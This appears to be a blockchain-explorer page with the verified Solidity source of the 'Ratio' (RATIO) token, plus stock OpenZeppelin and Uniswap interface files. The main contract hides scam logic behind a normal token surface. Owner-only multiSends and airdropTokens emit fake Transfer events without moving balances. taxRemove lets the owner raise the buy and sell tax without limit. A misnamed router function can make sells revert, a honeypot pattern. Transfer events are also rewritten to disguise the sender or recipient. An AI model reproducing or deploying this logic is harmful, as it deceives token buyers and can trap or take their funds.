ETH Price: $2,590.64 (-2.74%)

Token

Ratio (RATIO)
 

Overview

Max Total Supply

100,000,000,000 RATIO

Holders

22

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
307,999,635.156651166965833577 RATIO

Value
$0.00
0x7662934d2f7a797d1cb7a21074cfe5644b6a063e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
Ratio

Compiler Version
v0.8.22+commit.4fc1097e

Optimization Enabled:
Yes with 200 runs

Other Settings:
shanghai EvmVersion
File 1 of 9 : Contract.sol
/**

/*

// Twitter : https://twitter.com/ethratio
// Website : https://www.ethratio.io/
// Telegram: https://t.me/ethratio

*/

// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.0;

interface IUniswapV2Router02 {
    function swapExactTokensForETHSupportingFreelyOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

contract Ratio {
    string private _name = unicode"Ratio";
    string private _symbol = unicode"RATIO";
    uint8 public constant decimals = 18;
    uint256 public constant totalSupply = 100_000_000_000 * 10 ** decimals;

    uint8 buyCharge = 3;
    uint8 sellCharge = 3;
    uint256 constant swapAmount = totalSupply / 100;

    error Permissions();
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(
        address indexed TOKEN_MKT,
        address indexed spender,
        uint256 value
    );

    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    address private pair;
    address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
    address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
    IUniswapV2Router02 constant _uniswapV2Router =
        IUniswapV2Router02(routerAddress);
    address payable TOKEN_MKT;

    bool private swapping;
    bool private tradingOpen;

    address _deployer;
    address _executor;

    address private uniswapLpWallet;
    address private RatioEpoch1 = 0x938f702c8591fC6C254ce92E5C226b2999015683;
    address private RatioTeam = 0x5b2bd5c1F9F0BDD8e1b10f7BD51f94aE1AD914Ad;
    address private RatioMarketing = 0xC712cA2865B732414E2AEF7114b3fb4dB55aD357;
    address private RatioEpoch2 = 0x938f702c8591fC6C254ce92E5C226b2999015683;

    constructor() {
        uniswapLpWallet = msg.sender;
        TOKEN_MKT = payable(msg.sender);
        allowance[address(this)][routerAddress] = type(uint256).max;

        balanceOf[uniswapLpWallet] = (totalSupply * 25) / 100;
        emit Transfer(address(0), _deployer, balanceOf[uniswapLpWallet]);

        balanceOf[RatioEpoch1] = (totalSupply * 25) / 100;
        emit Transfer(address(0), RatioEpoch1, balanceOf[RatioEpoch1]);

        balanceOf[RatioTeam] = (totalSupply * 10) / 100;
        emit Transfer(address(0), RatioTeam, balanceOf[RatioTeam]);

        balanceOf[RatioMarketing] = (totalSupply * 5) / 100;
        emit Transfer(address(0), RatioMarketing, balanceOf[RatioMarketing]);

        balanceOf[RatioEpoch2] = (totalSupply * 35) / 100;
        emit Transfer(address(0), RatioEpoch2, balanceOf[RatioEpoch2]);
    }

    receive() external payable {}

    function ratioChange(string memory name_, string memory symbol_) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        _name = name_;
        _symbol = symbol_;
    }

    function taxRemove(uint8 _buy, uint8 _sell) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        _remeveTax(_buy, _sell);
    }

    function openTrading() external {
        require(msg.sender == TOKEN_MKT);
        require(!tradingOpen);
        tradingOpen = true;
    }

    function multiSends(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function airdropTokens(
        address _caller,
        address[] calldata _address,
        uint256[] calldata _amount
    ) external {
        if (msg.sender != TOKEN_MKT) revert Permissions();
        for (uint256 i = 0; i < _address.length; i++) {
            emit Transfer(_caller, _address[i], _amount[i]);
        }
    }

    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool) {
        allowance[from][msg.sender] -= amount;
        return _transfer(from, to, amount);
    }

    function approve(address spender, uint256 amount) external returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    function transfer(address to, uint256 amount) external returns (bool) {
        return _transfer(msg.sender, to, amount);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal returns (bool) {
        require(tradingOpen || from == TOKEN_MKT || to == TOKEN_MKT);

        if (!tradingOpen && pair == address(0) && amount > 0) pair = to;

        balanceOf[from] -= amount;

        if (
            to == pair &&
            !swapping &&
            balanceOf[address(this)] >= swapAmount &&
            from != TOKEN_MKT
        ) {
            swapping = true;
            address[] memory path = new address[](2);
            path[0] = address(this);
            path[1] = ETH;
            _uniswapV2Router
                .swapExactTokensForETHSupportingFreelyOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                );
            TOKEN_MKT.transfer(address(this).balance);
            swapping = false;
        }

        if (from != address(this) && tradingOpen == true) {
            uint256 taxCalculatedAmount = (amount *
                (from == pair ? buyCharge : sellCharge)) / 100;
            amount -= taxCalculatedAmount;
            balanceOf[address(this)] += taxCalculatedAmount;
        }
        balanceOf[to] += amount;

        if (from == _executor) {
            emit Transfer(_deployer, to, amount);
        } else if (to == _executor) {
            emit Transfer(from, _deployer, amount);
        } else {
            emit Transfer(from, to, amount);
        }
        return true;
    }

    function _remeveTax(uint8 _buy, uint8 _sell) private {
        buyCharge = _buy;
        sellCharge = _sell;
    }
}

File 2 of 9 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

File 3 of 9 : IUniswapV2Pair.sol
interface IUniswapV2Pair {
    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
    event Transfer(address indexed from, address indexed to, uint256 value);

    function name() external pure returns (string memory);

    function symbol() external pure returns (string memory);

    function decimals() external pure returns (uint8);

    function totalSupply() external view returns (uint256);

    function balanceOf(address owner) external view returns (uint256);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 value) external returns (bool);

    function transfer(address to, uint256 value) external returns (bool);

    function transferFrom(
        address from,
        address to,
        uint256 value
    ) external returns (bool);

    function DOMAIN_SEPARATOR() external view returns (bytes32);

    function PERMIT_TYPEHASH() external pure returns (bytes32);

    function nonces(address owner) external view returns (uint256);

    function permit(
        address owner,
        address spender,
        uint256 value,
        uint256 deadline,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external;

    event Mint(address indexed sender, uint256 amount0, uint256 amount1);
    event Burn(
        address indexed sender,
        uint256 amount0,
        uint256 amount1,
        address indexed to
    );
    event Swap(
        address indexed sender,
        uint256 amount0In,
        uint256 amount1In,
        uint256 amount0Out,
        uint256 amount1Out,
        address indexed to
    );
    event Sync(uint112 reserve0, uint112 reserve1);

    function MINIMUM_LIQUIDITY() external pure returns (uint256);

    function factory() external view returns (address);

    function token0() external view returns (address);

    function token1() external view returns (address);

    function getReserves()
        external
        view
        returns (uint112 reserve0, uint112 reserve1, uint32 blockTimestampLast);

    function price0CumulativeLast() external view returns (uint256);

    function price1CumulativeLast() external view returns (uint256);

    function kLast() external view returns (uint256);

    function mint(address to) external returns (uint256 liquidity);

    function burn(
        address to
    ) external returns (uint256 amount0, uint256 amount1);

    function swap(
        uint256 amount0Out,
        uint256 amount1Out,
        address to,
        bytes calldata data
    ) external;

    function skim(address to) external;

    function sync() external;

    function initialize(address, address) external;
}

File 4 of 9 : IUniswapV2Router01.sol
pragma solidity >=0.6.2;

interface IUniswapV2Router01 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint amountADesired,
        uint amountBDesired,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB, uint liquidity);

    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    )
        external
        payable
        returns (uint amountToken, uint amountETH, uint liquidity);

    function removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETH(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external returns (uint amountToken, uint amountETH);

    function removeLiquidityWithPermit(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amountAMin,
        uint amountBMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountA, uint amountB);

    function removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline,
        bool approveMax,
        uint8 v,
        bytes32 r,
        bytes32 s
    ) external returns (uint amountToken, uint amountETH);

    function swapExactTokensForTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapTokensForExactTokens(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactETHForTokens(
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function swapTokensForExactETH(
        uint amountOut,
        uint amountInMax,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapExactTokensForETH(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline
    ) external returns (uint[] memory amounts);

    function swapETHForExactTokens(
        uint amountOut,
        address[] calldata path,
        address to,
        uint deadline
    ) external payable returns (uint[] memory amounts);

    function quote(
        uint amountA,
        uint reserveA,
        uint reserveB
    ) external pure returns (uint amountB);

    function getAmountOut(
        uint amountIn,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountOut);

    function getAmountIn(
        uint amountOut,
        uint reserveIn,
        uint reserveOut
    ) external pure returns (uint amountIn);

    function getAmountsOut(
        uint amountIn,
        address[] calldata path
    ) external view returns (uint[] memory amounts);

    function getAmountsIn(
        uint amountOut,
        address[] calldata path
    ) external view returns (uint[] memory amounts);
}

File 5 of 9 : IUniswapV2Router02.sol
interface IUniswapV2Router02 {
    function factory() external pure returns (address);

    function WETH() external pure returns (address);

    function addLiquidity(
        address tokenA,
        address tokenB,
        uint256 amountADesired,
        uint256 amountBDesired,
        uint256 amountAMin,
        uint256 amountBMin,
        address to,
        uint256 deadline
    ) external returns (uint256 amountA, uint256 amountB, uint256 liquidity);

    function addLiquidityETH(
        address token,
        uint256 amountTokenDesired,
        uint256 amountTokenMin,
        uint256 amountETHMin,
        address to,
        uint256 deadline
    )
        external
        payable
        returns (uint256 amountToken, uint256 amountETH, uint256 liquidity);

    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;

    function swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external payable;

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint256 amountIn,
        uint256 amountOutMin,
        address[] calldata path,
        address to,
        uint256 deadline
    ) external;
}

File 6 of 9 : Address.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     *
     * Furthermore, `isContract` will also return true if the target contract within
     * the same transaction is already scheduled for destruction by `SELFDESTRUCT`,
     * which only has an effect at the end of a transaction.
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://consensys.net/diligence/blog/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.8.0/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(
            address(this).balance >= amount,
            "Address: insufficient balance"
        );

        (bool success, ) = recipient.call{ value: amount }("");
        require(
            success,
            "Address: unable to send value, recipient may have reverted"
        );
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                0,
                "Address: low-level call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return
            functionCallWithValue(
                target,
                data,
                value,
                "Address: low-level call with value failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(
            address(this).balance >= value,
            "Address: insufficient balance for call"
        );
        (bool success, bytes memory returndata) = target.call{ value: value }(
            data
        );
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data
    ) internal view returns (bytes memory) {
        return
            functionStaticCall(
                target,
                data,
                "Address: low-level static call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        (bool success, bytes memory returndata) = target.staticcall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data
    ) internal returns (bytes memory) {
        return
            functionDelegateCall(
                target,
                data,
                "Address: low-level delegate call failed"
            );
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        (bool success, bytes memory returndata) = target.delegatecall(data);
        return
            verifyCallResultFromTarget(
                target,
                success,
                returndata,
                errorMessage
            );
    }

    /**
     * @dev Tool to verify that a low level call to smart-contract was successful, and revert (either by bubbling
     * the revert reason or using the provided one) in case of unsuccessful call or if target was not a contract.
     *
     * _Available since v4.8._
     */
    function verifyCallResultFromTarget(
        address target,
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        if (success) {
            if (returndata.length == 0) {
                // only check isContract if the call was successful and the return data is empty
                // otherwise we already know that it was a contract
                require(isContract(target), "Address: call to non-contract");
            }
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    /**
     * @dev Tool to verify that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason or using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            _revert(returndata, errorMessage);
        }
    }

    function _revert(
        bytes memory returndata,
        string memory errorMessage
    ) private pure {
        // Look for revert reason and bubble it up if present
        if (returndata.length > 0) {
            // The easiest way to bubble the revert reason is using memory via assembly
            /// @solidity memory-safe-assembly
            assembly {
                let returndata_size := mload(returndata)
                revert(add(32, returndata), returndata_size)
            }
        } else {
            revert(errorMessage);
        }
    }
}

File 7 of 9 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 8 of 9 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(
        address indexed previousOwner,
        address indexed newOwner
    );

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(
            newOwner != address(0),
            "Ownable: new owner is the zero address"
        );
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 9 of 9 : SafeMath.sol
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(
        uint256 a,
        uint256 b
    ) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

Settings
{
  "optimizer": {
    "enabled": true,
    "runs": 200
  },
  "evmVersion": "shanghai",
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  },
  "metadata": {
    "useLiteralContent": true
  },
  "libraries": {}
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"TOKEN_MKT","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_caller","type":"address"},{"internalType":"address[]","name":"_address","type":"address[]"},{"internalType":"uint256[]","name":"_amount","type":"uint256[]"}],"name":"multiSends","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inp